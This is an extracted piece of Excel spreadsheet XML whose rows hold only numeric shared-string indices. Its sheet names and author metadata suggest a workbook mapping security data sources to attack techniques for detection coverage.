        <v>785</v>
      </c>
    </row>
    <row r="219" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A219" s="12" t="s">
        <v>278</v>
      </c>
      <c r="B219" s="12" t="s">
        <v>1092</v>
      </c>
      <c r="C219" s="12" t="s">
        <v>419</v>
      </c>
      <c r="D219" s="12" t="s">
        <v>406</v>
      </c>
      <c r="E219" s="12" t="s">
        <v>1371</v>
      </c>
      <c r="F219" s="12" t="s">
        <v>1372</v>
      </c>
      <c r="G219" s="12" t="s">
        <v>610</v>
      </c>
      <c r="H219" s="12" t="s">
        <v>1327</v>
      </c>
    </row>
    <row r="220" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A220" s="12" t="s">
        <v>279</v>
      </c>
      <c r="B220" s="12" t="s">
        <v>1093</v>
      </c>
      <c r="C220" s="12" t="s">
        <v>1094</v>
      </c>
      <c r="D220" s="12" t="s">
        <v>396</v>
      </c>
      <c r="E220" s="12" t="s">
        <v>1095</v>
      </c>
      <c r="F220" s="12" t="s">
        <v>1096</v>
      </c>
      <c r="G220" s="12" t="s">
        <v>393</v>
      </c>
      <c r="H220" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="221" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A221" s="12" t="s">
        <v>280</v>
      </c>
      <c r="B221" s="12" t="s">
        <v>1097</v>
      </c>
      <c r="C221" s="12" t="s">
        <v>1098</v>
      </c>
      <c r="D221" s="12" t="s">
        <v>406</v>
      </c>
      <c r="E221" s="12" t="s">
        <v>1373</v>
      </c>
      <c r="F221" s="12" t="s">
        <v>1374</v>
      </c>
      <c r="G221" s="12" t="s">
        <v>610</v>
      </c>
      <c r="H221" s="12" t="s">
        <v>1254</v>
      </c>
    </row>
    <row r="222" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A222" s="12" t="s">
        <v>281</v>
      </c>
      <c r="B222" s="12" t="s">
        <v>1099</v>
      </c>
      <c r="C222" s="12" t="s">
        <v>1100</v>
      </c>
      <c r="D222" s="12" t="s">
        <v>406</v>
      </c>
      <c r="E222" s="12" t="s">
        <v>1101</v>
      </c>
      <c r="F222" s="12" t="s">
        <v>1375</v>
      </c>
      <c r="G222" s="12" t="s">
        <v>417</v>
      </c>
      <c r="H222" s="12" t="s">
        <v>1376</v>
      </c>
    </row>
    <row r="223" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A223" s="12" t="s">
        <v>282</v>
      </c>
      <c r="B223" s="12" t="s">
        <v>1377</v>
      </c>
      <c r="C223" s="12" t="s">
        <v>575</v>
      </c>
      <c r="D223" s="12" t="s">
        <v>396</v>
      </c>
      <c r="E223" s="12" t="s">
        <v>1378</v>
      </c>
      <c r="F223" s="12" t="s">
        <v>1379</v>
      </c>
      <c r="G223" s="12" t="s">
        <v>417</v>
      </c>
      <c r="H223" s="12" t="s">
        <v>1380</v>
      </c>
    </row>
    <row r="224" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A224" s="12" t="s">
        <v>283</v>
      </c>
      <c r="B224" s="12" t="s">
        <v>1102</v>
      </c>
      <c r="C224" s="12" t="s">
        <v>411</v>
      </c>
      <c r="D224" s="12" t="s">
        <v>406</v>
      </c>
      <c r="E224" s="12" t="s">
        <v>1103</v>
      </c>
      <c r="F224" s="12" t="s">
        <v>1104</v>
      </c>
      <c r="G224" s="12" t="s">
        <v>610</v>
      </c>
      <c r="H224" s="12" t="s">
        <v>1327</v>
      </c>
    </row>
    <row r="225" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A225" s="12" t="s">
        <v>1381</v>
      </c>
      <c r="B225" s="12" t="s">
        <v>1382</v>
      </c>
      <c r="C225" s="12" t="s">
        <v>344</v>
      </c>
      <c r="D225" s="12" t="s">
        <v>390</v>
      </c>
      <c r="E225" s="12" t="s">
        <v>1383</v>
      </c>
      <c r="F225" s="12" t="s">
        <v>1384</v>
      </c>
      <c r="G225" s="12" t="s">
        <v>417</v>
      </c>
      <c r="H225" s="12" t="s">
        <v>1385</v>
      </c>
    </row>
    <row r="226" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A226" s="12" t="s">
        <v>1386</v>
      </c>
      <c r="B226" s="12" t="s">
        <v>1387</v>
      </c>
      <c r="C226" s="12" t="s">
        <v>1388</v>
      </c>
      <c r="D226" s="12" t="s">
        <v>406</v>
      </c>
      <c r="E226" s="12" t="s">
        <v>1389</v>
      </c>
      <c r="F226" s="12" t="s">
        <v>1390</v>
      </c>
      <c r="G226" s="12" t="s">
        <v>421</v>
      </c>
      <c r="H226" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="227" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A227" s="12" t="s">
        <v>1391</v>
      </c>
      <c r="B227" s="12" t="s">
        <v>1392</v>
      </c>
      <c r="C227" s="12" t="s">
        <v>1393</v>
      </c>
      <c r="D227" s="12" t="s">
        <v>390</v>
      </c>
      <c r="E227" s="12" t="s">
        <v>1394</v>
      </c>
      <c r="F227" s="12" t="s">
        <v>1395</v>
      </c>
      <c r="G227" s="12" t="s">
        <v>393</v>
      </c>
      <c r="H227" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="228" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A228" s="12" t="s">
        <v>1396</v>
      </c>
      <c r="B228" s="12" t="s">
        <v>1397</v>
      </c>
      <c r="C228" s="12" t="s">
        <v>371</v>
      </c>
      <c r="D228" s="12" t="s">
        <v>406</v>
      </c>
      <c r="E228" s="12" t="s">
        <v>1398</v>
      </c>
      <c r="F228" s="12" t="s">
        <v>1399</v>
      </c>
      <c r="G228" s="12" t="s">
        <v>417</v>
      </c>
      <c r="H228" s="12" t="s">
        <v>1400</v>
      </c>
    </row>
    <row r="229" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A229" s="12" t="s">
        <v>1401</v>
      </c>
      <c r="B229" s="12" t="s">
        <v>1402</v>
      </c>
      <c r="C229" s="12" t="s">
        <v>1403</v>
      </c>
      <c r="D229" s="12" t="s">
        <v>390</v>
      </c>
      <c r="E229" s="12" t="s">
        <v>1404</v>
      </c>
      <c r="F229" s="12" t="s">
        <v>1405</v>
      </c>
      <c r="G229" s="12" t="s">
        <v>1406</v>
      </c>
      <c r="H229" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="230" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A230" s="12" t="s">
        <v>1407</v>
      </c>
      <c r="B230" s="12" t="s">
        <v>1408</v>
      </c>
      <c r="C230" s="12" t="s">
        <v>1409</v>
      </c>
      <c r="D230" s="12" t="s">
        <v>390</v>
      </c>
      <c r="E230" s="12" t="s">
        <v>1410</v>
      </c>
      <c r="F230" s="12" t="s">
        <v>1411</v>
      </c>
      <c r="G230" s="12" t="s">
        <v>1406</v>
      </c>
      <c r="H230" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="231" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A231" s="12" t="s">
        <v>1412</v>
      </c>
      <c r="B231" s="12" t="s">
        <v>1413</v>
      </c>
      <c r="C231" s="12" t="s">
        <v>1414</v>
      </c>
      <c r="D231" s="12" t="s">
        <v>1005</v>
      </c>
      <c r="E231" s="12" t="s">
        <v>1415</v>
      </c>
      <c r="F231" s="12" t="s">
        <v>1416</v>
      </c>
      <c r="G231" s="12" t="s">
        <v>1406</v>
      </c>
      <c r="H231" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="232" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A232" s="12" t="s">
        <v>1417</v>
      </c>
      <c r="B232" s="12" t="s">
        <v>1418</v>
      </c>
      <c r="C232" s="12" t="s">
        <v>1419</v>
      </c>
      <c r="D232" s="12" t="s">
        <v>390</v>
      </c>
      <c r="E232" s="12" t="s">
        <v>1420</v>
      </c>
      <c r="F232" s="12" t="s">
        <v>1421</v>
      </c>
      <c r="G232" s="12" t="s">
        <v>1406</v>
      </c>
      <c r="H232" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="233" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A233" s="12" t="s">
        <v>1422</v>
      </c>
      <c r="B233" s="12" t="s">
        <v>1423</v>
      </c>
      <c r="C233" s="12" t="s">
        <v>1424</v>
      </c>
      <c r="D233" s="12" t="s">
        <v>406</v>
      </c>
      <c r="E233" s="12" t="s">
        <v>1425</v>
      </c>
      <c r="F233" s="12" t="s">
        <v>1426</v>
      </c>
      <c r="G233" s="12" t="s">
        <v>1406</v>
      </c>
      <c r="H233" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="234" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A234" s="12" t="s">
        <v>1427</v>
      </c>
      <c r="B234" s="12" t="s">
        <v>1428</v>
      </c>
      <c r="C234" s="12" t="s">
        <v>1429</v>
      </c>
      <c r="D234" s="12" t="s">
        <v>1005</v>
      </c>
      <c r="E234" s="12" t="s">
        <v>1430</v>
      </c>
      <c r="F234" s="12" t="s">
        <v>1431</v>
      </c>
      <c r="G234" s="12" t="s">
        <v>1406</v>
      </c>
      <c r="H234" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="235" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A235" s="12" t="s">
        <v>1432</v>
      </c>
      <c r="B235" s="12" t="s">
        <v>1433</v>
      </c>
      <c r="C235" s="12" t="s">
        <v>1434</v>
      </c>
      <c r="D235" s="12" t="s">
        <v>390</v>
      </c>
      <c r="E235" s="12" t="s">
        <v>1435</v>
      </c>
      <c r="F235" s="12" t="s">
        <v>1436</v>
      </c>
      <c r="G235" s="12" t="s">
        <v>1406</v>
      </c>
      <c r="H235" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="236" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A236" s="12" t="s">
        <v>1437</v>
      </c>
      <c r="B236" s="12" t="s">
        <v>1438</v>
      </c>
      <c r="C236" s="12" t="s">
        <v>1439</v>
      </c>
      <c r="D236" s="12" t="s">
        <v>390</v>
      </c>
      <c r="E236" s="12" t="s">
        <v>1440</v>
      </c>
      <c r="F236" s="12" t="s">
        <v>1441</v>
      </c>
      <c r="G236" s="12" t="s">
        <v>1406</v>
      </c>
      <c r="H236" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="237" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A237" s="12" t="s">
        <v>1442</v>
      </c>
      <c r="B237" s="12" t="s">
        <v>1443</v>
      </c>
      <c r="C237" s="12" t="s">
        <v>1444</v>
      </c>
      <c r="D237" s="12" t="s">
        <v>390</v>
      </c>
      <c r="E237" s="12" t="s">
        <v>1445</v>
      </c>
      <c r="F237" s="12" t="s">
        <v>1446</v>
      </c>
      <c r="G237" s="12" t="s">
        <v>1406</v>
      </c>
      <c r="H237" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="238" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A238" s="12" t="s">
        <v>1447</v>
      </c>
      <c r="B238" s="12" t="s">
        <v>1448</v>
      </c>
      <c r="C238" s="12" t="s">
        <v>514</v>
      </c>
      <c r="D238" s="12" t="s">
        <v>390</v>
      </c>
      <c r="E238" s="12" t="s">
        <v>1449</v>
      </c>
      <c r="F238" s="12" t="s">
        <v>1450</v>
      </c>
      <c r="G238" s="12" t="s">
        <v>1406</v>
      </c>
      <c r="H238" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="239" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A239" s="12" t="s">
        <v>1451</v>
      </c>
      <c r="B239" s="12" t="s">
        <v>1452</v>
      </c>
      <c r="C239" s="12" t="s">
        <v>1453</v>
      </c>
      <c r="D239" s="12" t="s">
        <v>390</v>
      </c>
      <c r="E239" s="12" t="s">
        <v>1454</v>
      </c>
      <c r="F239" s="12" t="s">
        <v>1455</v>
      </c>
      <c r="G239" s="12" t="s">
        <v>1406</v>
      </c>
      <c r="H239" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="240" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A240" s="12" t="s">
        <v>1456</v>
      </c>
      <c r="B240" s="12" t="s">
        <v>1457</v>
      </c>
      <c r="C240" s="12" t="s">
        <v>1458</v>
      </c>
      <c r="D240" s="12" t="s">
        <v>1217</v>
      </c>
      <c r="E240" s="12" t="s">
        <v>1459</v>
      </c>
      <c r="F240" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="G240" s="12" t="s">
        <v>1406</v>
      </c>
      <c r="H240" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="241" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A241" s="12" t="s">
        <v>1461</v>
      </c>
      <c r="B241" s="12" t="s">
        <v>1462</v>
      </c>
      <c r="C241" s="12" t="s">
        <v>419</v>
      </c>
      <c r="D241" s="12" t="s">
        <v>802</v>
      </c>
      <c r="E241" s="12" t="s">
        <v>1463</v>
      </c>
      <c r="F241" s="12" t="s">
        <v>1464</v>
      </c>
      <c r="G241" s="12" t="s">
        <v>1465</v>
      </c>
      <c r="H241" s="12" t="s">
        <v>1385</v>
      </c>
    </row>
    <row r="242" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A242" s="12" t="s">
        <v>1466</v>
      </c>
      <c r="B242" s="12" t="s">
        <v>1467</v>
      </c>
      <c r="C242" s="12" t="s">
        <v>1468</v>
      </c>
      <c r="D242" s="12" t="s">
        <v>390</v>
      </c>
      <c r="E242" s="12" t="s">
        <v>1469</v>
      </c>
      <c r="F242" s="12" t="s">
        <v>1470</v>
      </c>
      <c r="G242" s="12" t="s">
        <v>1406</v>
      </c>
      <c r="H242" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="243" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A243" s="12" t="s">
        <v>1471</v>
      </c>
      <c r="B243" s="12" t="s">
        <v>1472</v>
      </c>
      <c r="C243" s="12" t="s">
        <v>1473</v>
      </c>
      <c r="D243" s="12" t="s">
        <v>390</v>
      </c>
      <c r="E243" s="12" t="s">
        <v>1474</v>
      </c>
      <c r="F243" s="12" t="s">
        <v>1475</v>
      </c>
      <c r="G243" s="12" t="s">
        <v>1406</v>
      </c>
      <c r="H243" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="244" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A244" s="12" t="s">
        <v>1476</v>
      </c>
      <c r="B244" s="12" t="s">
        <v>1477</v>
      </c>
      <c r="C244" s="12" t="s">
        <v>1478</v>
      </c>
      <c r="D244" s="12" t="s">
        <v>390</v>
      </c>
      <c r="E244" s="12" t="s">
        <v>1479</v>
      </c>
      <c r="F244" s="12" t="s">
        <v>1480</v>
      </c>
      <c r="G244" s="12" t="s">
        <v>417</v>
      </c>
      <c r="H244" s="12" t="s">
        <v>1481</v>
      </c>
    </row>
    <row r="245" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A245" s="12" t="s">
        <v>1482</v>
      </c>
      <c r="B245" s="12" t="s">
        <v>1483</v>
      </c>
      <c r="C245" s="12" t="s">
        <v>1478</v>
      </c>
      <c r="D245" s="12" t="s">
        <v>1484</v>
      </c>
      <c r="E245" s="12" t="s">
        <v>1485</v>
      </c>
      <c r="F245" s="12" t="s">
        <v>1486</v>
      </c>
      <c r="G245" s="12" t="s">
        <v>409</v>
      </c>
      <c r="H245" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="246" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A246" s="12" t="s">
        <v>1487</v>
      </c>
      <c r="B246" s="12" t="s">
        <v>1488</v>
      </c>
      <c r="C246" s="12" t="s">
        <v>1489</v>
      </c>
      <c r="D246" s="12" t="s">
        <v>406</v>
      </c>
      <c r="E246" s="12" t="s">
        <v>1490</v>
      </c>
      <c r="F246" s="12" t="s">
        <v>1491</v>
      </c>
      <c r="G246" s="12" t="s">
        <v>583</v>
      </c>
      <c r="H246" s="12" t="s">
        <v>1492</v>
      </c>
    </row>
    <row r="247" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A247" s="12" t="s">
        <v>1493</v>
      </c>
      <c r="B247" s="12" t="s">
        <v>1494</v>
      </c>
      <c r="C247" s="12" t="s">
        <v>1495</v>
      </c>
      <c r="D247" s="12" t="s">
        <v>390</v>
      </c>
      <c r="E247" s="12" t="s">
        <v>1496</v>
      </c>
      <c r="F247" s="12" t="s">
        <v>1497</v>
      </c>
      <c r="G247" s="12" t="s">
        <v>403</v>
      </c>
      <c r="H247" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="248" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A248" s="12" t="s">
        <v>1498</v>
      </c>
      <c r="B248" s="12" t="s">
        <v>1499</v>
      </c>
      <c r="C248" s="12" t="s">
        <v>1500</v>
      </c>
      <c r="D248" s="12" t="s">
        <v>406</v>
      </c>
      <c r="E248" s="12" t="s">
        <v>1501</v>
      </c>
      <c r="F248" s="12" t="s">
        <v>1502</v>
      </c>
      <c r="G248" s="12" t="s">
        <v>443</v>
      </c>
      <c r="H248" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="249" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A249" s="12" t="s">
        <v>1503</v>
      </c>
      <c r="B249" s="12" t="s">
        <v>1504</v>
      </c>
      <c r="C249" s="12" t="s">
        <v>1505</v>
      </c>
      <c r="D249" s="12" t="s">
        <v>1506</v>
      </c>
      <c r="E249" s="12" t="s">
        <v>1507</v>
      </c>
      <c r="F249" s="12" t="s">
        <v>1508</v>
      </c>
      <c r="G249" s="12" t="s">
        <v>409</v>
      </c>
      <c r="H249" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="250" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A250" s="12" t="s">
        <v>1509</v>
      </c>
      <c r="B250" s="12" t="s">
        <v>1510</v>
      </c>
      <c r="C250" s="12" t="s">
        <v>1511</v>
      </c>
      <c r="D250" s="12" t="s">
        <v>1512</v>
      </c>
      <c r="E250" s="12" t="s">
        <v>1513</v>
      </c>
      <c r="F250" s="12" t="s">
        <v>1514</v>
      </c>
      <c r="G250" s="12" t="s">
        <v>1515</v>
      </c>
      <c r="H250" s="12" t="s">
        <v>1516</v>
      </c>
    </row>
    <row r="251" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A251" s="12" t="s">
        <v>1517</v>
      </c>
      <c r="B251" s="12" t="s">
        <v>1518</v>
      </c>
      <c r="C251" s="12" t="s">
        <v>1519</v>
      </c>
      <c r="D251" s="12" t="s">
        <v>846</v>
      </c>
      <c r="E251" s="12" t="s">
        <v>1520</v>
      </c>
      <c r="F251" s="12" t="s">
        <v>1521</v>
      </c>
      <c r="G251" s="12" t="s">
        <v>626</v>
      </c>
      <c r="H251" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="252" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A252" s="12" t="s">
        <v>1522</v>
      </c>
      <c r="B252" s="12" t="s">
        <v>1523</v>
      </c>
      <c r="C252" s="12" t="s">
        <v>1478</v>
      </c>
      <c r="D252" s="12" t="s">
        <v>390</v>
      </c>
      <c r="E252" s="12" t="s">
        <v>606</v>
      </c>
      <c r="F252" s="12" t="s">
        <v>1524</v>
      </c>
      <c r="G252" s="12" t="s">
        <v>421</v>
      </c>
      <c r="H252" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="253" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A253" s="12" t="s">
        <v>1525</v>
      </c>
      <c r="B253" s="12" t="s">
        <v>1526</v>
      </c>
      <c r="C253" s="12" t="s">
        <v>911</v>
      </c>
      <c r="D253" s="12" t="s">
        <v>846</v>
      </c>
      <c r="E253" s="12" t="s">
        <v>1527</v>
      </c>
      <c r="F253" s="12" t="s">
        <v>1528</v>
      </c>
      <c r="G253" s="12" t="s">
        <v>443</v>
      </c>
      <c r="H253" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="254" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A254" s="12" t="s">
        <v>1529</v>
      </c>
      <c r="B254" s="12" t="s">
        <v>1530</v>
      </c>
      <c r="C254" s="12" t="s">
        <v>1531</v>
      </c>
      <c r="D254" s="12" t="s">
        <v>1532</v>
      </c>
      <c r="E254" s="12" t="s">
        <v>1533</v>
      </c>
      <c r="F254" s="12" t="s">
        <v>1534</v>
      </c>
      <c r="G254" s="12" t="s">
        <v>403</v>
      </c>
      <c r="H254" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="255" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A255" s="12" t="s">
        <v>1535</v>
      </c>
      <c r="B255" s="12" t="s">
        <v>1536</v>
      </c>
      <c r="C255" s="12" t="s">
        <v>785</v>
      </c>
      <c r="D255" s="12" t="s">
        <v>1537</v>
      </c>
      <c r="E255" s="12" t="s">
        <v>1538</v>
      </c>
      <c r="F255" s="12" t="s">
        <v>1539</v>
      </c>
      <c r="G255" s="12" t="s">
        <v>409</v>
      </c>
      <c r="H255" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="256" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A256" s="12" t="s">
        <v>1540</v>
      </c>
      <c r="B256" s="12" t="s">
        <v>1541</v>
      </c>
      <c r="C256" s="12" t="s">
        <v>1542</v>
      </c>
      <c r="D256" s="12" t="s">
        <v>1543</v>
      </c>
      <c r="E256" s="12" t="s">
        <v>1544</v>
      </c>
      <c r="F256" s="12" t="s">
        <v>1545</v>
      </c>
      <c r="G256" s="12" t="s">
        <v>421</v>
      </c>
      <c r="H256" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="257" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A257" s="12" t="s">
        <v>1546</v>
      </c>
      <c r="B257" s="12" t="s">
        <v>1547</v>
      </c>
      <c r="C257" s="12" t="s">
        <v>1548</v>
      </c>
      <c r="D257" s="12" t="s">
        <v>1549</v>
      </c>
      <c r="E257" s="12" t="s">
        <v>1550</v>
      </c>
      <c r="F257" s="12" t="s">
        <v>1551</v>
      </c>
      <c r="G257" s="12" t="s">
        <v>1515</v>
      </c>
      <c r="H257" s="12" t="s">
        <v>1552</v>
      </c>
    </row>
    <row r="258" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A258" s="12" t="s">
        <v>1553</v>
      </c>
      <c r="B258" s="12" t="s">
        <v>1554</v>
      </c>
      <c r="C258" s="12" t="s">
        <v>1555</v>
      </c>
      <c r="D258" s="12" t="s">
        <v>1556</v>
      </c>
      <c r="E258" s="12" t="s">
        <v>1557</v>
      </c>
      <c r="F258" s="12" t="s">
        <v>1558</v>
      </c>
      <c r="G258" s="12" t="s">
        <v>403</v>
      </c>
      <c r="H258" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="259" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A259" s="12" t="s">
        <v>1559</v>
      </c>
      <c r="B259" s="12" t="s">
        <v>1560</v>
      </c>
      <c r="C259" s="12" t="s">
        <v>1561</v>
      </c>
      <c r="D259" s="12" t="s">
        <v>390</v>
      </c>
      <c r="E259" s="12" t="s">
        <v>1562</v>
      </c>
      <c r="F259" s="12" t="s">
        <v>1563</v>
      </c>
      <c r="G259" s="12" t="s">
        <v>1406</v>
      </c>
      <c r="H259" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="260" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A260" s="12" t="s">
        <v>1564</v>
      </c>
      <c r="B260" s="12" t="s">
        <v>1565</v>
      </c>
      <c r="C260" s="12" t="s">
        <v>1566</v>
      </c>
      <c r="D260" s="12" t="s">
        <v>1532</v>
      </c>
      <c r="E260" s="12" t="s">
        <v>1567</v>
      </c>
      <c r="F260" s="12" t="s">
        <v>1568</v>
      </c>
      <c r="G260" s="12" t="s">
        <v>413</v>
      </c>
      <c r="H260" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="261" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A261" s="12" t="s">
        <v>1569</v>
      </c>
      <c r="B261" s="12" t="s">
        <v>1570</v>
      </c>
      <c r="C261" s="12" t="s">
        <v>1561</v>
      </c>
      <c r="D261" s="12" t="s">
        <v>390</v>
      </c>
      <c r="E261" s="12" t="s">
        <v>1571</v>
      </c>
      <c r="F261" s="12" t="s">
        <v>1572</v>
      </c>
      <c r="G261" s="12" t="s">
        <v>1406</v>
      </c>
      <c r="H261" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="262" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A262" s="12" t="s">
        <v>1573</v>
      </c>
      <c r="B262" s="12" t="s">
        <v>1574</v>
      </c>
      <c r="C262" s="12" t="s">
        <v>1575</v>
      </c>
      <c r="D262" s="12" t="s">
        <v>1349</v>
      </c>
      <c r="E262" s="12" t="s">
        <v>1576</v>
      </c>
      <c r="F262" s="12" t="s">
        <v>1577</v>
      </c>
      <c r="G262" s="12" t="s">
        <v>457</v>
      </c>
      <c r="H262" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="263" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A263" s="12" t="s">
        <v>1578</v>
      </c>
      <c r="B263" s="12" t="s">
        <v>1579</v>
      </c>
      <c r="C263" s="12" t="s">
        <v>1566</v>
      </c>
      <c r="D263" s="12" t="s">
        <v>1532</v>
      </c>
      <c r="E263" s="12" t="s">
        <v>1580</v>
      </c>
      <c r="F263" s="12" t="s">
        <v>1581</v>
      </c>
      <c r="G263" s="12" t="s">
        <v>417</v>
      </c>
      <c r="H263" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="264" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A264" s="12" t="s">
        <v>1582</v>
      </c>
      <c r="B264" s="12" t="s">
        <v>1583</v>
      </c>
      <c r="C264" s="12" t="s">
        <v>1584</v>
      </c>
      <c r="D264" s="12" t="s">
        <v>1532</v>
      </c>
      <c r="E264" s="12" t="s">
        <v>1585</v>
      </c>
      <c r="F264" s="12" t="s">
        <v>1586</v>
      </c>
      <c r="G264" s="12" t="s">
        <v>417</v>
      </c>
      <c r="H264" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="265" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A265" s="12" t="s">
        <v>1587</v>
      </c>
      <c r="B265" s="12" t="s">
        <v>1588</v>
      </c>
      <c r="C265" s="12" t="s">
        <v>1566</v>
      </c>
      <c r="D265" s="12" t="s">
        <v>1589</v>
      </c>
      <c r="E265" s="12" t="s">
        <v>1590</v>
      </c>
      <c r="F265" s="12" t="s">
        <v>1591</v>
      </c>
      <c r="G265" s="12" t="s">
        <v>399</v>
      </c>
      <c r="H265" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="266" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A266" s="12" t="s">
        <v>1592</v>
      </c>
      <c r="B266" s="12" t="s">
        <v>1593</v>
      </c>
      <c r="C266" s="12" t="s">
        <v>1594</v>
      </c>
      <c r="D266" s="12" t="s">
        <v>1595</v>
      </c>
      <c r="E266" s="12" t="s">
        <v>1596</v>
      </c>
      <c r="F266" s="12" t="s">
        <v>1597</v>
      </c>
      <c r="G266" s="12" t="s">
        <v>421</v>
      </c>
      <c r="H266" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="267" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A267" s="12" t="s">
        <v>1598</v>
      </c>
      <c r="B267" s="12" t="s">
        <v>1599</v>
      </c>
      <c r="C267" s="12" t="s">
        <v>911</v>
      </c>
      <c r="D267" s="12" t="s">
        <v>1600</v>
      </c>
      <c r="E267" s="12" t="s">
        <v>1601</v>
      </c>
      <c r="F267" s="12" t="s">
        <v>1602</v>
      </c>
      <c r="G267" s="12" t="s">
        <v>403</v>
      </c>
      <c r="H267" s="12" t="s">
        <v>785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DataSourceEvents</vt:lpstr>
      <vt:lpstr>TechniqueDataSourceWeights</vt:lpstr>
      <vt:lpstr>RatingLegend</vt:lpstr>
      <vt:lpstr>KnowledgeBase</vt:lpstr>
      <vt:lpstr>REF-DataSources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Hartong, Olaf (NL - Amsterdam)</dc:creator>
  <cp:lastModifiedBy>Olaf Hartong</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-12-27T13:18:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-10-26T12:59:45Z</dcterms:modified>
</cp:coreProperties>
</file>